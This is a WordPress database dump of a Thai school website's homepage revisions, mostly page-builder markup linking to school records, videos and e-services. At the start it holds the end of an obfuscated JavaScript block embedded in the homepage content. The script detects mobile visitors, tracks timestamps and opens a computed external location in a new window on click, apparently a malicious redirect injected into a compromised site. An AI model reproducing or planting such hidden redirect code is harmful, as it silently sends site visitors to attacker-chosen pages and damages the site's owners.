_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 08:58:42','2024-08-30 01:58:42','',19,'http://watprato.ssk.in.th/?p=280',0,'revision','',0),
(281,2,'2024-08-30 09:04:12','2024-08-30 02:04:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 